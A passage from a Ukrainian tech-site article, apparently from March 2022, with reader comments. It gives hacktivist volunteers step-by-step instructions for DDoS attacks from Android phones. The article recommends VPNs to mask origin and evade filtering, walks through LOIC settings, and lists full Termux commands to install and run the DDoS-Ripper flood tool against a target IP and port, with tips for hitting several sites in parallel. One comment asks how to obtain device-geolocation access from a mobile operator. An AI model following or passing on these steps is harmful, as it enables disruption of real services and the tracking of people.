Координована DDoS-атака на Android

Підписуйтеся на Telegram-канал «DOU #tech», щоб не пропустити нові технічні статті.

Волонтерське угруповання хактивістів України «Кібер-козаки» має на меті ціленаправлені атаки. Усі атаки проводяться командами (див. канал telegram). Важливо проводити атаку лише з увімкненим VPN. Найкращий варіант — це використовувати IP-адресу рф, проте можливо використовувати і інші країни. Українські IP фільтруються сайтами. Для ефективності періодично змінюйте країну VPN.

VPN

Windscribe (коштує 9$);
F Secure;
Clear VPN (рік безкоштовної підписки для України);
Urban VPN;
Psiphone VPN;
будь-який інший VPN.

Android

LOIC (v. 5.0)

Вкажіть IP (з каналу), натисніть Lock On.
Вкажiть порт.
Оберіть метод HTTP.
Натисніть FIRE.

Threads (потоки) — встановлюються приблизно, кількість залежить від якості інтернет-з’єднання.

Додаток відсутній у Play Market, тому потрібно завантажити apk файл:

Signature A5A92CCB1D5A5B319E1857E9F775F4F910B060B7
MD5 8DA77997D0B91E02B01FD8D2ABA2ACFF

Termux DDoS Riper

Termux — додаток емулятор терміналу та середовища Linux.

DDoS-Ripper — популярний ddos-сервер, написаний на Python. Атакує лише одну ціль за раз, проте termux має можливість створення декількох паралельних сесій, відповідно можна паралельно атакувати декілька сайтів.

Встановлення

Якщо отримуєте помилку unable to locate package, змініть дзеркала Termux:

termux-change-repo, та оберіть перший з репозиторію main. Якщо команду написати неправильно, вона не розпізнається.
встановіть git — pkg install git -y
встановіть python — pkg install python -y
встановіть python3 — pkg install python3 -y
скопіюйте проект — git clone github.com/palahsu/DDoS-Ripper.git
перемістіться у папку cd DDoS-Ripper
перегляньте файли $ ls
запустіть скрипт $ python3 DRipper.py

Команди

python3 DRipper.py -s 87.236.16.230 -p 443, де замість 87.236.16.230 підставте будь IP адресу, на яку зараз проводиться атака (канал).

p вкажіть порт
t кількість потоків (запитів)

Якщо сайт не доступний, ви отримаєте повідомлення — no connection! web server maybe down! Якщо не вдається запустити атаку, перегляньте, з якої країни сайт ще доступний і атакуйте з неї.

Перевірити доступність атакованного сайту можна за допомогою таких ресурсу port.ping.pe та подібних.

Теми: Android, DDOS, tech, війна, інформвійна

Ctrl + Enter

Igor Mazur Инженер надежности веб-сайтов 23.03.2022 11:49

Уточните у украинских операторов еще — я думаю их каналы тоже не резиновые.

Відповісти

Підтримати

Богдан Свердлюк 23.03.2022 19:49

Так і є. Рекомендую по можливості використовувати wi-fi

Igor Mazur

Vladyslav Yermakov Project Manager\Product Owner 22.03.2022 17:04

А долго ли cloudflare будет доступен в РФ? Или они за орков?

Богдан Свердлюк 22.03.2022 18:45

На dou є стаття про позицію cloudflare. Вони не збираються іти з росії

Vladyslav Yermakov

Андрюха Цибрій Freelancer в freelance 22.03.2022 20:09

вибачаюсь за оффтоп, випадково побачив ваше місце роботи
можливо підскажете, хто може і на яких умовах отримати доступ до апі київстар з можливістю геолокації пристрою?
api-gateway.kyivstar.ua/...oneNumber-/location-match

Богдан Свердлюк

Богдан Свердлюк 23.03.2022 19:52

Пробачте в мене інший напрямок роботи, не знаю

Андрюха Цибрій